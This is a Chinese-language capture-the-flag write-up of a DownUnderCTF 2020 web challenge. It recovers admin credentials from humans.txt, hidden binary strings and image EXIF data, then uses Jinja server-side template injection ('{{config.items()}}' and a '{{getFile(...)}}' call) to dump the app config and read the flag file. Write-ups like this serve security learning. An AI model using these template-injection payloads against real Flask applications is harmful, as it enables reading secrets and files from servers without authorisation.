/DownunderCTF 2020的Robotssss。
开题让我们登录,题目提示robot,先看一下robots.txt,没有这个文件???
然后注册,登录,有两个Info:
Robot rebels!
Human developers think that they are cool by using robots.txt to tell search engine crawlers which pages or files the crawler can or can't request from your site. But this is insulting to us robots. Lets get them back with using humans.txt. This should stop human crawlers from find pages or files on our website.
From yours truly, Robot developers
Hey robot devs!
Delete this post the second all you robot devs see this (we can't let any humans see this). I left the secret flag at /s3cr3t_p4th/robot_fl4g.txt. Remember to delete this post ASAP!
From yours truly, Robot Admin
第一个告诉我们这题不用robots.txt,改成humans.txt了,第二个告诉我们flag在/s3cr3t_p4th/robot_fl4g.txt。看一下humans.txt,提示/4dm1n_Cr3ds,访问后提示Good day robot rebel. The admin cred is 6zMLV46JRp6kAmTs3nx5AG4WJgYeY.
,这个值不随IP改变、时间等改变,固定值。
注册后Cookie为Flask格式:.eJwtzjkSwjAMAMC_uE4h67Kdz2QkWxpoE1Ix_B0Kqm33XY4843qU_XXesZXjucpe 0Mci8EaVQ0iDsJJFQ8PKNN3HDxlRlyBQxARPyC4py2guM56hicDsoq1VyZzdIJW9A3BiD87pmtJTVMdyc1bLptYTKlLZyn3F-c-UzxeSJi9T.X3sYtg.o0JYCdYE usTA8S939UhbeGYqhmY
,解完为:{"_fresh":true,"_id":"2b9d30b7314e536e3213ae72a2143cbb914359e1d5203eec0bf0f85f5da3cdaa4ce6f2044b567715ffc8a0f64b8004f28e4f cb6f58f5669dbab46af76a8f0123","user_id":"2"}
。
然后发现我们看两则消息时的URL为:/robot_blogs/1
,改一下那个1,返回404。
后来在提示flag位置的页面上F12发现藏了一段noscript:<noscript><p class="magic">0110011001101100001101000110011100101110011101000111100001110100</p></noscript>
,解完是fl4g.txt。同理,提示humans.txt那里也有一个,humen.txt。humen.txt提示/Bender,可以发现一张图,下载下来,看EXIF信息,Artist又有一段011000010110010001101101011010010110111000111010010101000110100001101001011100110010110101001001011100110010110101010100011010000110010100101101010000010110010001101101011010010110111000101101010100000110000101110011011100110111011101101111011100100110010000101101010110000100010000100001
,解完admin:This-Is-The-Admin-Password-XD!
,那就登录吧。
然后允许我们输入东西,返回结果,很明显往SSTI想。16返回16,好了,直接读{{config.items()}}
,没有想要的。那就读flag了。然后发现,过滤了_[]
,那没了啊。然后仔细回头看config.items的东西:([('ENV', 'production'), ('DEBUG', False), ('TESTING', False), ('PROPAGATE_EXCEPTIONS', None), ('PRESERVE_CONTEXT_ON_EXCEPTION', None), ('SECRET_KEY', "app.jinja_env.globals['getFile'] = getFile(fileName)"), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(days=31)), ('USE_X_SENDFILE', False), ('SERVER_NAME', None), ('APPLICATION_ROOT', '/'), ('SESSION_COOKIE_NAME', 'session'), ('SESSION_COOKIE_DOMAIN', False), ('SESSION_COOKIE_PATH', None), ('SESSION_COOKIE_HTTPONLY', True), ('SESSION_COOKIE_SECURE', False), ('SESSION_COOKIE_SAMESITE', None), ('SESSION_REFRESH_EACH_REQUEST', True), ('MAX_CONTENT_LENGTH', None), ('SEND_FILE_MAX_AGE_DEFAULT', datetime.timedelta(seconds=43200)), ('TRAP_BAD_REQUEST_ERRORS', None), ('TRAP_HTTP_EXCEPTIONS', False), ('EXPLAIN_TEMPLATE_LOADING', False), ('PREFERRED_URL_SCHEME', 'http'), ('JSON_AS_ASCII', True), ('JSON_SORT_KEYS', True), ('JSONIFY_PRETTYPRINT_REGULAR', False), ('JSONIFY_MIMETYPE', 'application/json'), ('TEMPLATES_AUTO_RELOAD', None), ('MAX_COOKIE_SIZE', 4093), ('SQLALCHEMY_DATABASE_URI', 'sqlite:////db/templatedb.db'), ('SQLALCHEMY_TRACK_MODIFICATIONS', False), ('DATABASE', '../templatedb.db'), ('SQLALCHEMY_BINDS', None), ('SQLALCHEMY_NATIVE_UNICODE', None), ('SQLALCHEMY_ECHO', False), ('SQLALCHEMY_RECORD_QUERIES', None), ('SQLALCHEMY_POOL_SIZE', None), ('SQLALCHEMY_POOL_TIMEOUT', None), ('SQLALCHEMY_POOL_RECYCLE', None), ('SQLALCHEMY_MAX_OVERFLOW', None), ('SQLALCHEMY_COMMIT_ON_TEARDOWN', False), ('SQLALCHEMY_ENGINE_OPTIONS', {})])
,有个app.jinja_env.globals['getFile'],我们试着用getFile读文件:{{getFile('/fl4g.txt')}}
,Gotcha。
flag{23798dd1-af76-4caf-aec3-c5c8a97903f4}